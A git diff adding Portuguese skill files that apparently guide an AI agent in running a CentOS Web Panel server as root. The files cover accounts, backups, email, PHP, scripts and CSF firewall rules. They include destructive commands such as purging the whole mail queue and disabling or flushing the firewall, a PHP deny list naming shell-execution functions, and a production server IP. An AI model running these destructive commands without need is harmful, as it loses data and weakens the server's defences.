## API de Gestão de Contas
### Remover Conta
```bash
/scripts/cwp_api account remove_user USERNAME
```
### Suspender Conta
```bash
/scripts/cwp_api account suspend_user USERNAME
```
### Reactivar Conta
```bash
/scripts/cwp_api account unsuspend_user USERNAME
```
### Corrigir Permissões
```bash
/scripts/cwp_api account fix_perms USERNAME
```
### Listar Domínios de Conta
```bash
/scripts/cwp_api account list_domains USERNAME
```
---
## API de Gestão de Bandwidth
### Reactivar Conta (Bandwidth Excedido)
```bash
# Nota: Requer aumentar bandwidth do utilizador/package primeiro
/scripts/cwp_api account unsuspend_bandwidth USERNAME
```
### Reset Bandwidth (Zero)
```bash
# Reseta bandwidth para 0 e reactiva conta
/scripts/cwp_api account reset_bandwidth USERNAME
```
---
## API de Gestão em Massa
### Actualizar Quotas (Todos)
```bash
# Aplica quotas do package a todos os utilizadores
/scripts/cwp_api account update_diskquota_all
```
### Actualizar Limites (Todos)
```bash
# Actualiza: quota, hourly_emails, cgroups, nproc, apache_nproc, inode, nofile
/scripts/cwp_api account update_limits_all
```
### Corrigir Permissões Mail
```bash
/scripts/cwp_api account mail_fix_permissions
```
### Actualizar Policyd (Todos)
```bash
/scripts/cwp_api account update_policyd_all
```
---
## API de DNS
### Rebuild named.conf
```bash
/scripts/cwp_api account rebuild_etc_named_conf
```
### Rebuild Zonas DNS (Todas)
```bash
/scripts/cwp_api account rebuild_var_named_all
```
### Rebuild Zona DNS (Específica)
```bash
/scripts/cwp_api account rebuild_var_named USERNAME DOMAIN
```
---
## Workflows
### 1. Listar Todas as Contas
```bash
sh /scripts/list_users
```
### 2. Descobrir Owner de Domínio
```bash
sh /scripts/whoowns descomplicar.pt
```
### 3. Suspender Conta Temporariamente
```bash
# 1. Suspender
/scripts/cwp_api account suspend_user USERNAME
# 2. Verificar
sh /scripts/list_users | grep USERNAME
```
### 4. Reactivar Conta Suspensa
```bash
# 1. Reactivar
/scripts/cwp_api account unsuspend_user USERNAME
# 2. Corrigir permissões (após reactivação)
/scripts/cwp_api account fix_perms USERNAME
```
### 5. Corrigir Permissões Após Operação SSH
```bash
# OBRIGATÓRIO após qualquer operação manual via SSH
/scripts/cwp_api account fix_perms USERNAME
```
---
## Scripts Auxiliares Documentados
| Script | Descrição |
|--------|-----------|
| `/scripts/ulimit_user_check` | Verifica limites de utilizador específico |
| `/scripts/cwpsrv_rebuild_user_conf` | Rebuild configuração de todos os utilizadores |
```bash
# Verificar limites de utilizador
sh /scripts/ulimit_user_check USERNAME
# Rebuild configs de utilizadores
sh /scripts/cwpsrv_rebuild_user_conf
```
---
## Anti-Patterns (NUNCA FAZER)
| Anti-Pattern | Risco | Alternativa |
|--------------|-------|-------------|
| Remover conta sem backup | Perda de dados | Backup primeiro |
| Editar ficheiros manualmente | Inconsistência | Usar API |
| Ignorar fix_perms após SSH | Erros permissões | SEMPRE fix_perms |
| Suspender sem avisar cliente | Problema comercial | Comunicar primeiro |
---
## Validação Pós-Operação
```bash
# Após qualquer operação de conta:
# 1. Verificar conta existe/estado
sh /scripts/list_users | grep USERNAME
# 2. Verificar domínios
/scripts/cwp_api account list_domains USERNAME
# 3. Testar acesso web
curl -sI http://DOMINIO | head -5
```
---
## Checklist de Execução
- [ ] Identificar username correcto
- [ ] Backup se operação destrutiva
- [ ] Executar comando API
- [ ] Verificar resultado
- [ ] fix_perms se necessário
- [ ] Testar acesso ao site
---
**Versão:** 1.0.0 | **Autor:** Descomplicar®
**Fonte:** wiki.centos-webpanel.com/cwp-admin-api, wiki.centos-webpanel.com/cwp-scripts

220
infraestrutura/skills/cwp-backup/SKILL.md Normal file
View File

@@ -0,0 +1,220 @@
---
name: cwp-backup
description: CWP backup creation and management using official scripts. Creates user backups, manages backup locations. Based on official CWP documentation only. Use when user mentions "backup cwp", "restaurar cwp", "backup conta", "user backup".
author: Descomplicar® Crescimento Digital
version: 1.0.0
quality_score: 70
user_invocable: true
desk_task: null
---
# /cwp-backup - Backups CWP (Documentação Oficial)
Gestão de backups no CWP usando scripts oficiais. **Zero assumptions, zero hallucinations** - apenas comandos documentados.
**REGRA #38 - ZERO INVENCAO:** NUNCA improvisar comandos. Verificar estado actual ANTES de alterar. Pesquisar wiki CWP se necessario. Usar APENAS scripts oficiais.
---
## Servidor Alvo
| Servidor | IP | MCP | User |
|----------|-----|-----|------|
| **CWP Principal** | 176.9.3.158 | ssh-unified | root |
---
## Documentação Base
- [CWP Scripts](https://wiki.centos-webpanel.com/cwp-scripts)
- [CWP Backups](https://wiki.centos-webpanel.com/category/backups)
---
## Paths Oficiais
| Path | Descrição |
|------|-----------|
| `/backup/` | Localização padrão de backups |
| `/scripts/user_backup` | Script de backup de utilizador |
| `/usr/local/cwpsrv/htdocs/resources/admin/include/cron_backup.php` | Cron de backup |
---
## Comando Principal de Backup
### Criar Backup de Utilizador
```bash
# COMANDO OFICIAL DOCUMENTADO
sh /scripts/user_backup USERNAME
```
**Nota:** Este comando cria um backup completo da conta incluindo:
- Ficheiros do site
- Bases de dados
- Emails
- Configurações
---
## Scripts de Consulta
```bash
# Listar utilizadores disponíveis para backup
sh /scripts/list_users
# Verificar owner de domínio
sh /scripts/whoowns DOMINIO
```
---
## Localização dos Backups
```bash
# Ver backups existentes
ls -lh /backup/
# Espaço usado por backups
du -sh /backup/
```
---
## Workflows
### 1. Criar Backup Completo de Conta
```bash
# 1. Identificar username
sh /scripts/whoowns DOMINIO
# 2. Criar backup
sh /scripts/user_backup USERNAME
# 3. Verificar criação
ls -lh /backup/ | grep USERNAME
```
### 2. Backup Antes de Operação Crítica
```bash
# SEMPRE fazer backup antes de:
# - Actualizar WordPress
# - Migrar site
# - Alterações massivas
sh /scripts/user_backup USERNAME
```
### 3. Verificar Espaço Disponível
```bash
# Antes de criar backup, verificar espaço
df -h /backup
# Tamanho de conta específica
du -sh /home/USERNAME/
```
---
## Configuração de Backups Automáticos
**Via CWP Admin:**
- CWP.admin → CWP Settings → Backup Configuration
**Cron (documentado):**
```bash
# O CWP usa este script para backups agendados
/usr/local/cwpsrv/htdocs/resources/admin/include/cron_backup.php
```
---
## Limitações Conhecidas (Documentadas)
| Limitação | Descrição |
|-----------|-----------|
| **GUI Restore** | Documentação menciona que "não funciona confiavelmente" |
| **Tamanho** | Backups grandes podem demorar |
| **Espaço** | Verificar espaço antes de criar |
---
## Anti-Patterns (NUNCA FAZER)
| Anti-Pattern | Risco | Alternativa |
|--------------|-------|-------------|
| Backup sem verificar espaço | Disco cheio | `df -h` primeiro |
| Confiar só em backups locais | Perda total | Backup remoto também |
| Restaurar via GUI | Falha | Restaurar manualmente |
| Não testar backups | Backup inválido | Testar periodicamente |
---
## Validação Pós-Backup
```bash
# 1. Verificar ficheiro criado
ls -lh /backup/ | grep USERNAME | tail -1
# 2. Verificar integridade (tar)
tar -tzf /backup/BACKUP_FILE.tar.gz > /dev/null && echo "OK" || echo "CORRUPTO"
# 3. Verificar tamanho razoável
# (deve ser similar ao tamanho da conta)
du -sh /home/USERNAME/
ls -lh /backup/BACKUP_FILE.tar.gz
```
---
## Restauro Manual (Procedimento Seguro)
**Nota:** O restauro via GUI não é fiável segundo documentação. Procedimento manual:
```bash
# 1. Extrair backup para pasta temporária
mkdir /tmp/restore_test
tar -xzf /backup/BACKUP_FILE.tar.gz -C /tmp/restore_test
# 2. Verificar conteúdo
ls -la /tmp/restore_test/
# 3. Restaurar ficheiros manualmente
# (copiar para localização correcta)
# 4. Corrigir permissões
chown -R USERNAME:USERNAME /home/USERNAME/public_html/
# 5. Limpar temporário
rm -rf /tmp/restore_test
```
---
## Checklist de Execução
- [ ] Verificar espaço em disco (`df -h`)
- [ ] Identificar username correcto
- [ ] Executar `sh /scripts/user_backup USERNAME`
- [ ] Verificar ficheiro criado
- [ ] Testar integridade do backup
- [ ] Documentar backup realizado
---
## Boas Práticas
1. **Backup antes de qualquer operação destrutiva**
2. **Manter backups remotos** (Google Drive, S3)
3. **Testar restauro periodicamente**
4. **Documentar localização de backups**
5. **Limpar backups antigos** (>30 dias)
---
**Versão:** 1.0.0 | **Autor:** Descomplicar®
**Fonte:** wiki.centos-webpanel.com/cwp-scripts, wiki.centos-webpanel.com/category/backups

232
infraestrutura/skills/cwp-email/SKILL.md Normal file
View File

@@ -0,0 +1,232 @@
---
name: cwp-email
description: CWP email management including DKIM, SPF, mail queue. Based on official CWP documentation only. Use when user mentions "email cwp", "dkim", "spf", "mail queue", "postfix cwp".
author: Descomplicar® Crescimento Digital
version: 1.0.0
quality_score: 70
user_invocable: true
desk_task: null
---
# /cwp-email - Email CWP (Documentação Oficial)
Gestão de email no CWP. **Zero assumptions, zero hallucinations** - apenas comandos documentados.
**REGRA #38 - ZERO INVENCAO:** NUNCA improvisar comandos. Verificar estado actual ANTES de alterar. Pesquisar wiki CWP se necessario. Usar APENAS scripts oficiais.
---
## Servidor Alvo
| Servidor | IP | MCP | User |
|----------|-----|-----|------|
| **CWP Principal** | 176.9.3.158 | ssh-unified | root |
---
## Documentação Base
- [Resolve Emails marked as SPAM](https://wiki.centos-webpanel.com/resolve-emails-marked-as-spam)
- [How to install DKIM 2048 bits](https://wiki.centos-webpanel.com/how-to-install-dkim-2048-bits-long-key)
- [CWP Scripts](https://wiki.centos-webpanel.com/cwp-scripts)
---
## Scripts Oficiais de Email
| Script | Descrição | Uso |
|--------|-----------|-----|
| `/scripts/install_cbpolicyd` | Instala limite de emails por hora | `sh /scripts/install_cbpolicyd` |
| `/scripts/check_postqueue` | Verifica mail queue | `sh /scripts/check_postqueue` |
| `/scripts/mail_queue_stats` | Estatísticas da mail queue | `sh /scripts/mail_queue_stats` |
| `/scripts/mail_roundcube_update` | Actualiza RoundCube | `sh /scripts/mail_roundcube_update` |
| `/scripts/mail_vmail_import` | Importa contas de /var/vmail | `sh /scripts/mail_vmail_import` |
| `/scripts/mail_rebuild_sni_certs` | Rebuild certificados mail | `sh /scripts/mail_rebuild_sni_certs` |
---
## DKIM & SPF
### Procedimento Documentado
1. **Rebuild Mail Server** via CWP.admin → Postfix Manager (com DKIM & SPF activado)
2. **Adicionar DKIM key** para cada domínio via DKIM Manager
### Testar DKIM
```bash
# Enviar email para teste
# Destino: check-auth@verifier.port25.com
# Deve receber resposta com "DKIM check: pass"
```
### DKIM 2048 bits (Chave Longa)
Quando adicionar TXT record para DKIM 2048-bit, dividir chave ao meio e envolver ambas as partes em quotes.
---
## Mail Queue Management
### Verificar Mail Queue
```bash
sh /scripts/check_postqueue
```
### Estatísticas da Queue
```bash
sh /scripts/mail_queue_stats
```
### Comandos Postfix (Padrão Linux)
```bash
# Ver queue
postqueue -p
# Flush queue (tentar enviar)
postqueue -f
# Ver mensagem específica
postcat -q QUEUE_ID
# Limpar queue (CUIDADO)
postsuper -d ALL
```
---
## Policyd (Limites de Email)
### Instalar
```bash
sh /scripts/install_cbpolicyd
```
### Função
Limita emails de entrada e saída por hora por utilizador.
### Actualizar Limites (Todos os Utilizadores)
```bash
/scripts/cwp_api account update_policyd_all
```
---
## Rebuild Certificados Mail
```bash
# Rebuild certificados Postfix/Dovecot
sh /scripts/mail_rebuild_sni_certs
```
---
## Corrigir Permissões de Mail
```bash
/scripts/cwp_api account mail_fix_permissions
```
---
## Verificações Anti-SPAM
### rDNS (Reverse DNS)
**Nota documentada:** "rDNS só pode ser configurado pelo provider de hosting - contactar provider."
### Blacklist Check
Verificar se IP do servidor está em blacklists:
- [MXToolbox Blacklist](https://mxtoolbox.com/blacklists.aspx)
### DMARC
Documentação recomenda configurar records DMARC para melhor autenticação.
---
## Workflows
### 1. Verificar Mail Queue
```bash
# Ver queue
sh /scripts/check_postqueue
# Ver estatísticas
sh /scripts/mail_queue_stats
```
### 2. Limpar Mail Queue (Emergência)
```bash
# Ver o que está na queue primeiro
postqueue -p | head -50
# Limpar tudo (CUIDADO - emails perdidos)
postsuper -d ALL
```
### 3. Rebuild Certificados Mail (Após SSL)
```bash
sh /scripts/mail_rebuild_sni_certs
```
### 4. Instalar Limites de Email
```bash
sh /scripts/install_cbpolicyd
```
---
## Anti-Patterns (NUNCA FAZER)
| Anti-Pattern | Risco | Alternativa |
|--------------|-------|-------------|
| Limpar queue sem verificar | Perda de emails | Ver queue primeiro |
| Ignorar blacklists | Emails não entregues | Verificar regularmente |
| DKIM sem testar | Falsa sensação segurança | Testar com verifier |
| Editar postfix directamente | Inconsistência CWP | Usar Postfix Manager |
---
## Validação
### Testar Envio
```bash
# Enviar email de teste via linha de comandos
echo "Test email" | mail -s "Test Subject" destinatario@example.com
```
### Verificar Logs
```bash
# Log de mail
tail -100 /var/log/maillog
```
---
## Checklist DKIM/SPF
- [ ] Mail Server rebuild com DKIM & SPF activo
- [ ] DKIM key adicionada para cada domínio
- [ ] Testar com check-auth@verifier.port25.com
- [ ] Verificar SPF record no DNS
- [ ] Verificar DMARC (opcional mas recomendado)
- [ ] Verificar blacklists
---
**Versão:** 1.0.0 | **Autor:** Descomplicar®
**Fonte:** wiki.centos-webpanel.com

213
infraestrutura/skills/cwp-php/SKILL.md Normal file
View File

@@ -0,0 +1,213 @@
---
name: cwp-php
description: CWP PHP version management. PHP Switcher, Selector, configuration. Based on official CWP documentation only. Use when user mentions "php cwp", "versão php", "php selector", "php switcher".
author: Descomplicar® Crescimento Digital
version: 1.0.0
quality_score: 70
user_invocable: true
desk_task: null
---
# /cwp-php - Gestão PHP CWP (Documentação Oficial)
Gestão de versões PHP no CWP. **Zero assumptions, zero hallucinations** - apenas informação documentada.
**REGRA #38 - ZERO INVENCAO:** NUNCA improvisar comandos. Verificar estado actual ANTES de alterar. Pesquisar wiki CWP se necessario. Usar APENAS scripts oficiais.
---
## Servidor Alvo
| Servidor | IP | MCP | User |
|----------|-----|-----|------|
| **CWP Principal** | 176.9.3.158 | ssh-unified | root |
---
## Documentação Base
- [PHP Selector](https://wiki.centos-webpanel.com/php-selector)
- [PHP Version Switcher](https://wiki.centos-webpanel.com/php-version-switcher)
- [CWP Scripts](https://wiki.centos-webpanel.com/cwp-scripts)
---
## Ferramentas PHP no CWP
O CWP oferece 3 ferramentas para gerir PHP:
| Ferramenta | Função |
|------------|--------|
| **PHP Switcher** | Versão principal do CWP (default para novos clientes) |
| **PHP Selector** | Permite diferentes versões por pasta/domínio |
| **PHP-FPM Selector** | Para sites que usam PHP-FPM |
---
## Versões PHP Disponíveis (Documentadas)
PHP Selector suporta: **4.4, 5.2, 5.3, 5.4, 5.5, 5.6, 7.0, 7.1, 7.2, 7.3, 7.4, 8.0, 8.1**
---
## Paths de Configuração
| Path | Descrição |
|------|-----------|
| `/usr/local/cwpsrv/htdocs/resources/conf/el7/php_switcher/` | Config CentOS 7 |
| `/usr/local/cwpsrv/htdocs/resources/conf/el8/php_switcher/` | Config CentOS 8 |
| `/var/log/php-rebuild.log` | Log de compilação PHP |
---
## Monitorizar Compilação PHP
```bash
# Ver log em tempo real durante instalação de versão PHP
tail -f /var/log/php-rebuild.log
# Ver log completo
cat /var/log/php-rebuild.log
```
---
## Scripts Oficiais
| Script | Descrição |
|--------|-----------|
| `/scripts/phpfpm_rebuild_user_conf` | Rebuild configuração PHP-FPM de utilizadores |
```bash
sh /scripts/phpfpm_rebuild_user_conf
```
---
## PHP por Pasta (Documentado)
Cada utilizador pode ter versão PHP diferente por pasta usando `.htaccess`:
```apache
# Exemplo .htaccess para usar PHP específico numa pasta
# (configurar via CWP PHP Selector primeiro)
```
---
## Desactivar Funções Perigosas (Documentado)
### PHP Switcher
```bash
echo "disable_functions = exec, system, popen, proc_open, shell_exec, passthru, show_source" > /usr/local/php/php.d/disabled_function.ini
```
**Nota:** Cada versão PHP tem caminho diferente.
---
## Adicionar Flags de Compilação (Documentado)
**Ficheiro exemplo CentOS 7 PHP 7.0:**
`/usr/local/cwpsrv/htdocs/resources/conf/el7/php_switcher/7.0.ini`
### Formato
```ini
[nome-unico]
default=0
option="--enable-opcao"
```
**Aviso documentado:** "CWP update will overwrite these files" - documentar alterações para reaplicar após updates.
---
## Verificações
### Versão PHP Actual
```bash
php -v
```
### Memory Limit
```bash
php -i | grep memory_limit
```
### OPcache Status
```bash
php -i | grep -E 'opcache.enable|opcache.memory_consumption'
```
### Processos PHP-FPM
```bash
ps aux | grep php-fpm | wc -l
```
---
## Workflows
### 1. Verificar Versão PHP
```bash
php -v | head -1
```
### 2. Ver Configuração PHP
```bash
php -i | grep -E 'memory_limit|upload_max|post_max|max_execution'
```
### 3. Rebuild PHP-FPM Config
```bash
sh /scripts/phpfpm_rebuild_user_conf
```
### 4. Monitorizar Instalação de Versão PHP
```bash
tail -f /var/log/php-rebuild.log
```
---
## Anti-Patterns (NUNCA FAZER)
| Anti-Pattern | Risco | Alternativa |
|--------------|-------|-------------|
| Editar .ini sem documentar | Perdido em update | Documentar alterações |
| Compilar PHP manualmente | Conflito com CWP | Usar PHP Selector |
| Ignorar php-rebuild.log | Não detectar erros | Monitorizar sempre |
---
## Notas Importantes
1. **PHP Switcher** é a versão default para novos utilizadores
2. **PHP Selector** permite versão por pasta
3. Updates do CWP podem sobrescrever configurações personalizadas
4. Sempre documentar alterações para reaplicar
---
## Checklist
- [ ] Verificar versão actual (`php -v`)
- [ ] Verificar configuração (`php -i`)
- [ ] Se alterar, documentar mudanças
- [ ] Testar sites após alterações
- [ ] Verificar logs se problemas
---
**Versão:** 1.0.0 | **Autor:** Descomplicar®
**Fonte:** wiki.centos-webpanel.com/php-selector, wiki.centos-webpanel.com/php-version-switcher

249
infraestrutura/skills/cwp-scripts/SKILL.md Normal file
View File

@@ -0,0 +1,249 @@
---
name: cwp-scripts
description: Complete reference for CWP /scripts/ folder. All official CLI scripts documented. Based on official CWP documentation only. Use when user mentions "cwp scripts", "scripts cwp", "/scripts/", "comando cwp".
author: Descomplicar® Crescimento Digital
version: 1.0.0
quality_score: 70
user_invocable: true
desk_task: null
---
# /cwp-scripts - Referência Completa Scripts CWP
Todos os scripts oficiais documentados do CWP. **Zero assumptions, zero hallucinations**.
**REGRA #38 - ZERO INVENCAO:** NUNCA improvisar comandos. Verificar estado actual ANTES de alterar. Pesquisar wiki CWP se necessario. Usar APENAS scripts oficiais.
---
## Servidor Alvo
| Servidor | IP | MCP | User |
|----------|-----|-----|------|
| **CWP Principal** | 176.9.3.158 | ssh-unified | root |
---
## Documentação Base
- [CWP Scripts](https://wiki.centos-webpanel.com/cwp-scripts)
---
## Como Executar
```bash
sh /scripts/NOME_SCRIPT
# ou
/scripts/NOME_SCRIPT
```
---
## Scripts por Categoria
### Sistema CWP
| Script | Descrição |
|--------|-----------|
| `/scripts/cwp_version` | Ver versão do CWP |
| `/scripts/update_cwp` | Actualizar CWP |
| `/scripts/restart_cwpsrv` | Restart painel CWP |
| `/scripts/reload_cwpsrv` | Reload daemon CWP |
| `/scripts/cwp_monitor` | Verificar load do servidor |
| `/scripts/cwp_set_memory_limit` | Alterar memory limit |
| `/scripts/add_alert` | Adicionar alerta |
### Utilizadores e Contas
| Script | Descrição |
|--------|-----------|
| `/scripts/list_users` | Listar todas as contas |
| `/scripts/list_domains` | Listar addon domains |
| `/scripts/list_subdomains` | Listar subdomínios |
| `/scripts/whoowns DOMINIO` | Descobrir owner de domínio |
| `/scripts/user_backup USERNAME` | Criar backup de conta |
| `/scripts/ulimit_user_check` | Verificar limites de utilizador |
| `/scripts/cwpsrv_rebuild_user_conf` | Rebuild config de utilizadores |
### SSL / Certificados
| Script | Descrição |
|--------|-----------|
| `/scripts/install_acme` | Instalar/reinstalar acme.sh |
| `/scripts/autossl_reload` | Reload AutoSSL |
| `/scripts/autossl_fix_tmp_path` | Corrigir path temp AutoSSL |
| `/scripts/autossl_generate_apache_conf` | Gerar config Apache SSL |
| `/scripts/generate_hostname_ssl` | Gerar SSL para hostname |
| `/scripts/hostname_ssl_restart_services` | Restart serviços após SSL hostname |
### MySQL / Base de Dados
| Script | Descrição |
|--------|-----------|
| `/scripts/upgrade_mysql` | Upgrade MySQL para 5.5 |
| `/scripts/mysql_pwd_reset` | Reset password root MySQL |
| `/scripts/mysql_fix_myisam_tables` | Reparar tabelas MyISAM |
| `/scripts/mysql_phpmyadmin_update` | Actualizar phpMyAdmin |
| `/scripts/mysql_set_max_connections` | Definir max_connections |
| `/scripts/mysql_show_max_connections` | Ver max_connections actual |
| `/scripts/checkdb` | Verificar erros nas BDs |
### Email / Mail
| Script | Descrição |
|--------|-----------|
| `/scripts/install_cbpolicyd` | Instalar limite emails/hora |
| `/scripts/check_postqueue` | Verificar mail queue |
| `/scripts/mail_queue_stats` | Estatísticas mail queue |
| `/scripts/mail_roundcube_update` | Actualizar RoundCube |
| `/scripts/mail_vmail_import` | Importar contas de /var/vmail |
| `/scripts/mail_rebuild_sni_certs` | Rebuild certificados mail |
### Web Servers
| Script | Descrição |
|--------|-----------|
| `/scripts/restart_httpd` | Restart Apache |
| `/scripts/apache_mpm_calculator` | Gerar config Apache MPM |
| `/scripts/varnish_clear_cache` | Limpar cache Varnish |
### PHP
| Script | Descrição |
|--------|-----------|
| `/scripts/phpfpm_rebuild_user_conf` | Rebuild config PHP-FPM |
| `/scripts/php_big_file_upload` | Definir limite upload |
| `/scripts/update_ioncube` | Actualizar IonCube |
| `/scripts/cron_fix_openbasedir` | Corrigir open_basedir cron |
| `/scripts/dso_handler_remove` | Remover handler PHP DSO |
### Segurança
| Script | Descrição |
|--------|-----------|
| `/scripts/cwp_bruteforce_protection` | Activar protecção brute-force |
| `/scripts/security_is_my_server_hacked` | **Verificar se servidor comprometido** |
| `/scripts/cwpsecure_update_rules` | Actualizar regras kernel seguro |
### FTP
| Script | Descrição |
|--------|-----------|
| `/scripts/reinstall_pure-ftpd` | Reinstalar Pure-FTP |
| `/scripts/install_pure-ftpd_tls` | Instalar TLS no FTP |
### DNS
| Script | Descrição |
|--------|-----------|
| `/scripts/dns_sync_slave2` | Sync zonas DNS |
### Aplicações
| Script | Descrição |
|--------|-----------|
| `/scripts/install_imagick` | Instalar ImageMagick |
| `/scripts/install_maldet` | Instalar Maldet (malware) |
| `/scripts/install_net2ftp` | Instalar Net2FTP |
| `/scripts/install_terminal` | Instalar terminal CWP |
| `/scripts/install_supportKey` | Instalar chave suporte |
| `/scripts/softaculous_fix_update` | Corrigir Softaculous |
### Antivírus / AntiSpam
| Script | Descrição |
|--------|-----------|
| `/scripts/freshclam` | Actualizar ClamAV |
| `/scripts/reinstall_clamd_amavisd` | Reinstalar ClamD e Amavis |
| `/scripts/clamd_fix_100_cpu_usage` | Corrigir ClamD 100% CPU |
### API
| Script | Descrição |
|--------|-----------|
| `/scripts/install_api` | Instalar/gerar API CWP |
| `/scripts/check_api` | Verificar API detalhado |
### Outros
| Script | Descrição |
|--------|-----------|
| `/scripts/chroot_add` | Adicionar JailKit |
| `/scripts/chroot_remove` | Remover JailKit |
| `/scripts/bandwidth_run` | Verificar bandwidth |
| `/scripts/disk_check` | Verificar partições |
| `/scripts/cgroups_blkio` | Obter disk id para cgroups |
| `/scripts/net_show_connections` | Ver conexões ordenadas |
| `/scripts/open_basedir-suphp` | Forçar open_basedir |
| `/scripts/image_rebuild_server_config` | Rebuild config servidor para default |
| `/scripts/cpanel_addhandlers` | Adicionar handlers cPanel ao suphp |
| `/scripts/el8_stream_convert_to_cwp_stable` | Converter CentOS 8 Stream para Stable |
---
## Scripts Mais Usados (Top 10)
1. `/scripts/user_backup USERNAME` - Backup de conta
2. `/scripts/whoowns DOMINIO` - Descobrir owner
3. `/scripts/list_users` - Listar contas
4. `/scripts/security_is_my_server_hacked` - Verificar segurança
5. `/scripts/mysql_pwd_reset` - Reset MySQL root
6. `/scripts/restart_httpd` - Restart Apache
7. `/scripts/check_postqueue` - Ver mail queue
8. `/scripts/cwp_version` - Ver versão CWP
9. `/scripts/update_cwp` - Actualizar CWP
10. `/scripts/varnish_clear_cache` - Limpar cache
---
## API CWP (/scripts/cwp_api)
Além dos scripts individuais, o CWP tem API unificada:
### Accounts
```bash
/scripts/cwp_api account remove_user USERNAME
/scripts/cwp_api account suspend_user USERNAME
/scripts/cwp_api account unsuspend_user USERNAME
/scripts/cwp_api account fix_perms USERNAME
/scripts/cwp_api account list_domains USERNAME
/scripts/cwp_api account update_diskquota_all
/scripts/cwp_api account update_limits_all
/scripts/cwp_api account mail_fix_permissions
/scripts/cwp_api account update_policyd_all
/scripts/cwp_api account rebuild_etc_named_conf
/scripts/cwp_api account rebuild_var_named_all
/scripts/cwp_api account rebuild_var_named USERNAME DOMAIN
```
### WebServers
```bash
/scripts/cwp_api webservers rebuild_all
/scripts/cwp_api webservers rebuild_user USERNAME
/scripts/cwp_api webservers restart
/scripts/cwp_api webservers reload
```
### Apps
```bash
/scripts/cwp_api apps install_softaculous
/scripts/cwp_api apps remove_softaculous
/scripts/cwp_api apps install_sitepad
/scripts/cwp_api apps remove_sitepad
```
---
## Checklist Antes de Executar
- [ ] Verificar nome do script correcto
- [ ] Verificar parâmetros necessários
- [ ] Backup se operação destrutiva
- [ ] Executar e verificar output
- [ ] Documentar acção
---
**Versão:** 1.0.0 | **Autor:** Descomplicar®
**Fonte:** wiki.centos-webpanel.com/cwp-scripts

290
infraestrutura/skills/cwp-security/SKILL.md Normal file
View File

@@ -0,0 +1,290 @@
---
name: cwp-security
description: CWP security management with CSF firewall. Block/unblock IPs, configure firewall, security hardening. Based on official CWP documentation only. Use when user mentions "csf", "firewall cwp", "bloquear ip", "segurança cwp", "ban ip".
author: Descomplicar® Crescimento Digital
version: 1.0.0
quality_score: 70
user_invocable: true
desk_task: null
---
# /cwp-security - Segurança CWP (Documentação Oficial)
Gestão de segurança no CWP usando CSF/LFD. **Zero assumptions, zero hallucinations** - apenas comandos documentados.
**REGRA #38 - ZERO INVENCAO:** NUNCA improvisar comandos. Verificar estado actual ANTES de alterar. Pesquisar wiki CWP se necessario. Usar APENAS scripts oficiais.
---
## Servidor Alvo
| Servidor | IP | MCP | User |
|----------|-----|-----|------|
| **CWP Principal** | 176.9.3.158 | ssh-unified | root |
---
## Documentação Base
- [CSF Firewall command line](https://wiki.centos-webpanel.com/csf-firewall-command-line)
- [CSF/LFD Firewall configuration](https://wiki.centos-webpanel.com/csflfd-firewall-configuration)
- [CWP Security Instructions](https://wiki.centos-webpanel.com/cwp-security-instructions)
---
## Paths de Configuração
| Path | Descrição |
|------|-----------|
| `/etc/csf/csf.conf` | Configuração principal CSF |
| `/etc/csf/` | Directório de configuração |
| `/etc/csf/csf.pignore` | Whitelist de processos |
| `/var/log/lfd.log` | Log do LFD |
---
## Comandos CSF Documentados
### Ajuda e Documentação
```bash
csf --help
man csf
```
### Controlo do Firewall
| Comando | Descrição |
|---------|-----------|
| `csf -e` | **Activar** CSF Firewall |
| `csf -x` | **Desactivar** CSF Firewall |
| `csf -r` | **Restart** (apenas regras iptables) |
| `csf -ra` | **Restart completo** (iptables + LFD) |
| `service lfd restart` | Restart apenas LFD |
### Gestão de IPs
| Comando | Descrição |
|---------|-----------|
| `csf -g IP` | **Verificar** se IP está bloqueado e porquê |
| `csf -d IP` | **Bloquear** IP permanentemente |
| `csf -td IP 86400` | **Bloquear temporário** (86400 = 24 horas em segundos) |
| `csf -dr IP` | **Desbloquear** IP |
| `csf -a IP` | **Whitelist** IP (acesso a todas as portas) |
| `csf -a 192.168.0.0/24` | **Whitelist** range de IPs |
| `csf -ta IP 86400` | **Whitelist temporário** (24 horas) |
| `csf -tf` | **Limpar** todos os bloqueios temporários |
| `csf -df` | **Limpar** todos os bloqueios permanentes |
### Verificar Logs
```bash
# Ver actividade de IP específico
grep "IP" /var/log/lfd.log
```
---
## Workflows
### 1. Verificar se IP está Bloqueado
```bash
csf -g 123.45.67.89
```
### 2. Bloquear IP Malicioso
```bash
# Bloquear permanentemente
csf -d 123.45.67.89
# Ou bloquear por 24 horas
csf -td 123.45.67.89 86400
```
### 3. Desbloquear IP (Cliente Legítimo)
```bash
csf -dr 123.45.67.89
```
### 4. Whitelist IP de Confiança
```bash
# Whitelist permanente
csf -a 188.251.199.30
# Whitelist range
csf -a 192.168.1.0/24
```
### 5. Limpar Todos os Bloqueios Temporários
```bash
csf -tf
```
### 6. Restart Completo do Firewall
```bash
csf -ra
```
---
## Configuração de Portas
**Ficheiro:** `/etc/csf/csf.conf`
```bash
# Portas abertas são definidas em:
# TCP_IN, TCP_OUT, UDP_IN, UDP_OUT
# Exemplo: abrir range de portas 30000-50000
# TCP_IN = "...,30000:50000"
```
**Importante:** Após alterações, executar `csf -r` para aplicar.
---
## Whitelist de Processos
**Ficheiro:** `/etc/csf/csf.pignore`
Adicionar processos que não devem ser monitorizados pelo LFD.
---
## Ignorar País (Evitar Bloqueios)
**Ficheiro:** `/etc/csf/csf.conf`
```bash
# Adicionar código do país para ignorar
CC_IGNORE = "PT"
```
---
## Scripts CWP de Segurança
| Script | Descrição |
|--------|-----------|
| `/scripts/cwp_bruteforce_protection` | Activa protecção brute-force CSF/LFD |
| `/scripts/security_is_my_server_hacked` | **Verifica** se servidor tem sinais de hack |
| `/scripts/cwpsecure_update_rules` | Actualiza regras do kernel seguro |
```bash
# Verificar se servidor foi comprometido
sh /scripts/security_is_my_server_hacked
# Activar protecção brute-force
sh /scripts/cwp_bruteforce_protection
```
---
## Configurações de Segurança (Documentadas)
### SSH Port
**Ficheiro:** `/etc/ssh/sshd_config`
```bash
# Após alterar porta SSH:
# 1. Actualizar csf.conf (TCP_IN)
# 2. service sshd restart
```
### tmpfs Security
**Ficheiro:** `/etc/fstab`
```bash
# Original:
tmpfs /dev/shm tmpfs defaults 0 0
# Seguro (documentado):
tmpfs /dev/shm tmpfs defaults,nodev,nosuid,noexec 0 0
```
### Kernel Panic Reboot
**Ficheiro:** `/etc/sysctl.conf`
```bash
# Adicionar:
vm.panic_on_oom=1
